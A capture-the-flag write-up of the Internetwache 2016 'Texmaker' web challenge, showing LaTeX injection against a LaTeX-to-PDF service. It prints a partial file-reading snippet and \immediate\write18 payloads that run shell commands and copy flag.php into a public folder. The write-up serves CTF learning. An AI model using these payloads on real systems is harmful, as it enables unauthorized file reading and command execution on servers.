Internetwache CTF 2016 — Web90 — Texmaker

This problem was my favorite of those I tried. When first navigating to the challenge site you are presented with an input field which generates LaTex, which is then used to generate a PDF.
This paper discusses methods for exploiting LaTex, including some sample code which could be used for reading files from the server.
    \read5 to \curline
    \ifeof5 \let\next=\relax
    \else \curline~\\
    \next} %
\ifeof5 Couldn’t Read the File! %
\else \readfile \closein5

After generating and checking the PDF I got the following:
Sweet sweet local files
The next step was learning how I could execute commands to look around the file system. I came across the \immediate\write18 combo of commands in this post, which will allow you to run commands on the server. The following line outputs the ls command to a temporary file:
\immediate\write18(ls /tmp/ > /tmp/tmpfile)

Looking into the /var/www/ directory, I found what I suspected was my flag file (flag.php).
Probably just cat the file right?
After trying a number of other ways of accessing the file (cat, grep, sed, head, tail, etc) I tried to run php -s which returns the source of the input php file.
I put together the following final payload and browsed to /pdf/derp.txt (as it was publicly accessible), revealing the flag!
\immediate\write18{php -s ../flag.php > ../pdf/derp.txt}
There’s the flag!